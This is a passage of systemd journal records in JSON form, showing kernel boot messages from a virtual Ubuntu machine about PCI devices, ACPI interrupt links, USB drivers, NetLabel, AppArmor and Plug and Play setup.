"_SOURCE_MONOTONIC_TIMESTAMP" : "329720", "MESSAGE" : "pci 0000:00:04.0: reg 0x14: [mem 0xfeb92000-0xfeb92fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10c;b=e2b08827b5804427b422c10c84f1567e;m=5615d1;t=5bd16dd199538;x=b23315038c74e053", "__REALTIME_TIMESTAMP" : "1615280779924792", "__MONOTONIC_TIMESTAMP" : "5641681", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "335597", "MESSAGE" : "pci 0000:00:04.0: reg 0x20: [mem 0xfe004000-0xfe007fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10d;b=e2b08827b5804427b422c10c84f1567e;m=567973;t=5bd16dd19f8da;x=8ff045f9f3e8fc82", "__REALTIME_TIMESTAMP" : "1615280779950298", "__MONOTONIC_TIMESTAMP" : "5667187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "337790", "MESSAGE" : "pci 0000:00:05.0: [1af4:1002] type 00 class 0x00ff00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10e;b=e2b08827b5804427b422c10c84f1567e;m=567a66;t=5bd16dd19f9cd;x=7d0a2d1aec5849bc", "__REALTIME_TIMESTAMP" : "1615280779950541", "__MONOTONIC_TIMESTAMP" : "5667430", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "338824", "MESSAGE" : "pci 0000:00:05.0: reg 0x10: [io 0xc0a0-0xc0bf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10f;b=e2b08827b5804427b422c10c84f1567e;m=567afa;t=5bd16dd19fa62;x=616e0cb21b26318b", "__REALTIME_TIMESTAMP" : "1615280779950690", "__MONOTONIC_TIMESTAMP" : "5667578", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "341694", "MESSAGE" : "pci 0000:00:05.0: reg 0x20: [mem 0xfe008000-0xfe00bfff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=110;b=e2b08827b5804427b422c10c84f1567e;m=567b1c;t=5bd16dd19fa83;x=a407ca8354182a3b", "__REALTIME_TIMESTAMP" : "1615280779950723", "__MONOTONIC_TIMESTAMP" : "5667612", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "344087", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=111;b=e2b08827b5804427b422c10c84f1567e;m=567b39;t=5bd16dd19faa0;x=5a080d416374655", "__REALTIME_TIMESTAMP" : "1615280779950752", "__MONOTONIC_TIMESTAMP" : "5667641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "348221", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=112;b=e2b08827b5804427b422c10c84f1567e;m=567b56;t=5bd16dd19fabe;x=f56c6933e8a41b64", "__REALTIME_TIMESTAMP" : "1615280779950782", "__MONOTONIC_TIMESTAMP" : "5667670", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "351450", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=113;b=e2b08827b5804427b422c10c84f1567e;m=567b61;t=5bd16dd19fac8;x=769b2591422f969", "__REALTIME_TIMESTAMP" : "1615280779950792", "__MONOTONIC_TIMESTAMP" : "5667681", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "352146", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=114;b=e2b08827b5804427b422c10c84f1567e;m=567b6c;t=5bd16dd19fad3;x=195d7febbfa8445e", "__REALTIME_TIMESTAMP" : "1615280779950803", "__MONOTONIC_TIMESTAMP" : "5667692", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "355786", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKS] (IRQs *9)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=115;b=e2b08827b5804427b422c10c84f1567e;m=567b76;t=5bd16dd19fadd;x=b6df4498793218fa", "__REALTIME_TIMESTAMP" : "1615280779950813", "__MONOTONIC_TIMESTAMP" : "5667702", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "356645", "MESSAGE" : "SCSI subsystem initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=116;b=e2b08827b5804427b422c10c84f1567e;m=567b81;t=5bd16dd19fae9;x=8d55216e4c7e3dcd", "__REALTIME_TIMESTAMP" : "1615280779950825", "__MONOTONIC_TIMESTAMP" : "5667713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "358701", "MESSAGE" : "libata version 3.00 loaded." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=117;b=e2b08827b5804427b422c10c84f1567e;m=567c19;t=5bd16dd19fb80;x=c2175f8ff043c5a4", "__REALTIME_TIMESTAMP" : "1615280779950976", "__MONOTONIC_TIMESTAMP" : "5667865", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "358802", "MESSAGE" : "pci 0000:00:02.0: vgaarb: setting as boot VGA device" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=118;b=e2b08827b5804427b422c10c84f1567e;m=567c9d;t=5bd16dd19fc04;x=7a84bcfa070c7460", "__REALTIME_TIMESTAMP" : "1615280779951108", "__MONOTONIC_TIMESTAMP" : "5667997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360000", "MESSAGE" : "pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=119;b=e2b08827b5804427b422c10c84f1567e;m=567d39;t=5bd16dd19fca0;x=8ee36903463241db", "__REALTIME_TIMESTAMP" : "1615280779951264", "__MONOTONIC_TIMESTAMP" : "5668153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360008", "MESSAGE" : "pci 0000:00:02.0: vgaarb: bridge control possible" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11a;b=e2b08827b5804427b422c10c84f1567e;m=569d98;t=5bd16dd1a1d00;x=3a17ec29797ff8da", "__REALTIME_TIMESTAMP" : "1615280779959552", "__MONOTONIC_TIMESTAMP" : "5676440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "363066", "MESSAGE" : "vgaarb: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11b;b=e2b08827b5804427b422c10c84f1567e;m=569dac;t=5bd16dd1a1d14;x=1b30f904cb43f9ba", "__REALTIME_TIMESTAMP" : "1615280779959572", "__MONOTONIC_TIMESTAMP" : "5676460", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "364055", "MESSAGE" : "ACPI: bus type USB registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11c;b=e2b08827b5804427b422c10c84f1567e;m=569db8;t=5bd16dd1a1d20;x=97b8feb4e6f9b89", "__REALTIME_TIMESTAMP" : "1615280779959584", "__MONOTONIC_TIMESTAMP" : "5676472", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "366051", "MESSAGE" : "usbcore: registered new interface driver usbfs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11d;b=e2b08827b5804427b422c10c84f1567e;m=569dc3;t=5bd16dd1a1d2a;x=42fa479078c5c9e8", "__REALTIME_TIMESTAMP" : "1615280779959594", "__MONOTONIC_TIMESTAMP" : "5676483", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "368021", "MESSAGE" : "usbcore: registered new interface driver hub" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11e;b=e2b08827b5804427b422c10c84f1567e;m=569dcd;t=5bd16dd1a1d35;x=fa26700969233205", "__REALTIME_TIMESTAMP" : "1615280779959605", "__MONOTONIC_TIMESTAMP" : "5676493", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "370837", "MESSAGE" : "usbcore: registered new device driver usb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11f;b=e2b08827b5804427b422c10c84f1567e;m=569dd9;t=5bd16dd1a1d40;x=a30123e6c2ae603e", "__REALTIME_TIMESTAMP" : "1615280779959616", "__MONOTONIC_TIMESTAMP" : "5676505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "372107", "MESSAGE" : "EDAC MC: Ver: 3.0.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=120;b=e2b08827b5804427b422c10c84f1567e;m=569de3;t=5bd16dd1a1d4a;x=4154a9cbb9225c3a", "__REALTIME_TIMESTAMP" : "1615280779959626", "__MONOTONIC_TIMESTAMP" : "5676515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "374382", "MESSAGE" : "PCI: Using ACPI for IRQ routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=121;b=e2b08827b5804427b422c10c84f1567e;m=569ded;t=5bd16dd1a1d55;x=2f78176316d38990", "__REALTIME_TIMESTAMP" : "1615280779959637", "__MONOTONIC_TIMESTAMP" : "5676525", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376022", "MESSAGE" : "PCI: pci_cache_line_size set to 64 bytes" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=122;b=e2b08827b5804427b422c10c84f1567e;m=569df8;t=5bd16dd1a1d5f;x=a1fa3e5d92e59af1", "__REALTIME_TIMESTAMP" : "1615280779959647", "__MONOTONIC_TIMESTAMP" : "5676536", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376268", "MESSAGE" : "e820: reserve RAM buffer [mem 0x0009fc00-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=123;b=e2b08827b5804427b422c10c84f1567e;m=569e08;t=5bd16dd1a1d70;x=33fcc6444001df97", "__REALTIME_TIMESTAMP" : "1615280779959664", "__MONOTONIC_TIMESTAMP" : "5676552", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376272", "MESSAGE" : "e820: reserve RAM buffer [mem 0x7ffdc000-0x7fffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=124;b=e2b08827b5804427b422c10c84f1567e;m=569e1a;t=5bd16dd1a1d81;x=7de80462cb8c7234", "__REALTIME_TIMESTAMP" : "1615280779959681", "__MONOTONIC_TIMESTAMP" : "5676570", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "376470", "MESSAGE" : "NetLabel: Initializing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=125;b=e2b08827b5804427b422c10c84f1567e;m=569e2d;t=5bd16dd1a1d95;x=745e5eda13f04557", "__REALTIME_TIMESTAMP" : "1615280779959701", "__MONOTONIC_TIMESTAMP" : "5676589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "378389", "MESSAGE" : "NetLabel: domain hash size = 128" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=126;b=e2b08827b5804427b422c10c84f1567e;m=569e3b;t=5bd16dd1a1da2;x=5eb1798268020a50", "__REALTIME_TIMESTAMP" : "1615280779959714", "__MONOTONIC_TIMESTAMP" : "5676603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "380004", "MESSAGE" : "NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=127;b=e2b08827b5804427b422c10c84f1567e;m=569e56;t=5bd16dd1a1dbd;x=f7c58fa3f2230516", "__REALTIME_TIMESTAMP" : "1615280779959741", "__MONOTONIC_TIMESTAMP" : "5676630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "383125", "MESSAGE" : "NetLabel: unlabeled traffic allowed by default" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=128;b=e2b08827b5804427b422c10c84f1567e;m=569e61;t=5bd16dd1a1dc8;x=daa121a1bb582c16", "__REALTIME_TIMESTAMP" : "1615280779959752", "__MONOTONIC_TIMESTAMP" : "5676641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "384157", "MESSAGE" : "clocksource: Switched to clocksource kvm-clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=129;b=e2b08827b5804427b422c10c84f1567e;m=569e7a;t=5bd16dd1a1de2;x=594e45daf27ba689", "__REALTIME_TIMESTAMP" : "1615280779959778", "__MONOTONIC_TIMESTAMP" : "5676666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "399085", "MESSAGE" : "VFS: Disk quotas dquot_6.6.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12a;b=e2b08827b5804427b422c10c84f1567e;m=569e85;t=5bd16dd1a1ded;x=1c5f6b3ad0a4a228", "__REALTIME_TIMESTAMP" : "1615280779959789", "__MONOTONIC_TIMESTAMP" : "5676677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "401433", "MESSAGE" : "VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12b;b=e2b08827b5804427b422c10c84f1567e;m=569e8f;t=5bd16dd1a1df7;x=e4ee10d3baf6d49a", "__REALTIME_TIMESTAMP" : "1615280779959799", "__MONOTONIC_TIMESTAMP" : "5676687", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "405167", "MESSAGE" : "AppArmor: AppArmor Filesystem Enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12c;b=e2b08827b5804427b422c10c84f1567e;m=569e9d;t=5bd16dd1a1e05;x=25ba10917f9ea7ff", "__REALTIME_TIMESTAMP" : "1615280779959813", "__MONOTONIC_TIMESTAMP" : "5676701", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "407740", "MESSAGE" : "pnp: PnP ACPI init" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12d;b=e2b08827b5804427b422c10c84f1567e;m=569f31;t=5bd16dd1a1e99;x=5b4cb66e7102180b", "__REALTIME_TIMESTAMP" : "1615280779959961", "__MONOTONIC_TIMESTAMP" : "5676849", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "409661", "MESSAGE" : "pnp 00:00: Plug and Play ACPI device, IDs PNP0b00 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12e;b=e2b08827b5804427b422c10c84f1567e;m=569fe9;t=5bd16dd1a1f51;x=85e432ba051410c7", "__REALTIME_TIMESTAMP" : "1615280779960145", "__MONOTONIC_TIMESTAMP" : "5677033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:01", "_UDEV_SYSNAME" : "00:01", "_SOURCE_MONOTONIC_TIMESTAMP" : "409719", "MESSAGE" : "pnp 00:01: Plug and Play ACPI device, IDs PNP0303 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12f;b=e2b08827b5804427b422c10c84f1567e;m=56a05f;t=5bd16dd1a1fc6;x=25b3311a744d6bbf", "__REALTIME_TIMESTAMP" : "1615280779960262", "__MONOTONIC_TIMESTAMP" : "5677151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:02", "_UDEV_SYSNAME" : "00:02", "_SOURCE_MONOTONIC_TIMESTAMP" : "409747", "MESSAGE" : "pnp 00:02: Plug and Play ACPI device, IDs PNP0f13 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=130;b=e2b08827b5804427b422c10c84f1567e;m=56a0ec;t=5bd16dd1a2054;x=b684f5eb4ed39c3e", "__REALTIME_TIMESTAMP" : "1615280779960404", "__MONOTONIC_TIMESTAMP" : "5677292", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409763", "MESSAGE" : "pnp 00:03: [dma 2]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=131;b=e2b08827b5804427b422c10c84f1567e;m=56a166;t=5bd16dd1a20cd;x=e03675d55dbb4263", "__REALTIME_TIMESTAMP" : "1615280779960525", "__MONOTONIC_TIMESTAMP" : "5677414", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409774", "MESSAGE" : "pnp 00:03: 